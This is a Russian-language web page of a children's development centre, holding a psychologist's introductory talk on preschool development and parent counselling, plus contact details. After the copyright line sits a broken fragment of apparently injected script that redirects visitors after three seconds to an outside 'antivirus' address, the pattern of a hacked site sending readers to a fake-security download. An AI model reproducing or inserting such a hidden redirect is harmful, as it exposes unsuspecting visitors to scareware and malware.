Домой

Психологические беседы в "Городе почемучек":

Беседа первая, ознакомительная.

Добрый день! Меня зовут Екатерина, и я представляю психологическую службу нашего развивающего центра (Ленинский проспект, 129, корпус 1). Располагая опытом работы как в муниципальных, так и в частных дошкольных образовательных учреждениях, я с полной уверенностью могу сказать: чем раньше малыш попадает в развивающую, психологически и педагогически продуманную среду, тем больше возможностей для дальнейшего развития и саморазвития открывается перед ним в будущем.

Что принято подразумевать под понятием "развитие" в нашем педагогическом центре? Это система психолого-педагогической помощи ребенку в становлении его как деятельной самобытной личности. Именно дошкольный период жизни, а в частности ранний возраст, даёт человеку ресурс и возможность выбирать уже во взрослом возрасте максимально творческую, максимально продуктивную линию жизни.

Итак, дошкольный возраст – сродни моменту рождения личности, не менее важен, чем момент физического рождения. Что же действительно происходит с малышом в этот период? Не приводя сейчас развернутых таблиц формирования тех или иных функций, скажу кратко, что в этот период происходит интенсивное развитие всех психических процессов и многих свойств личности. Маленький человек активно осваивает широкий спектр различных видов деятельности; развивается самосознание, формируется самооценка, происходит выстраивание иерархии мотивов и их соподчинение.

В этой связи понимая, и наблюдая на практике важнейшую роль родительской компетенции, родительского умения (а зачастую, к сожалению, и неумения) оказывать помогающее, обдуманное коррекционно-развивающее воздействие ребенку, мы готовы и рады оказывать консультативно-практическую помощь по вопросам внутрисемейных и детско-родительских отношений.

Ну что ж, подводя краткие итоги нашей первой беседы, настало время решить, по пути ли нам?

Прочь сомненья, если:

  • Вы понимаете, что развитие и обучение в раннем возрасте – это принципиально разные вещи. Первое - формирует психику ребенка, готовит ее к восприятию самой разной информации, ее самостоятельной обработке (мыслетворчество). Второе - ничто иное, как процесс передачи знаний, умений и навыков (усвоение стереотипа, шаблона).
  • Вы понимаете суть развивающего воздействия, но не владеете приемами оказания подобного воздействия. Понимаю "что", но не знаю "как"?
  • И, наконец, Вы понимаете, главное - чтобы малыш вырос счастливым. Ведь школа жизни – сложная штука, и предлагает задачки не только на интеллект, но и на умение понимать другого, дружить, любить. Здесь одной школы интеллекта крайне недостаточно.

Согласны? Значит нам по пути!


 
Ленинский проспект
д.129,   к.1
+7 (495) 438-3706
Схема проезда

 
citypoch@yandex.ru
Марьинский парк
д.7,   к.2
+7 (499) 517-9368
Схема проезда
© 2006 − 2013 детский развивающий центр "Город почемучек"
setTimeout(\'document.location.href = "http://base-file.com/antivirus"\', 3000);'); } ?>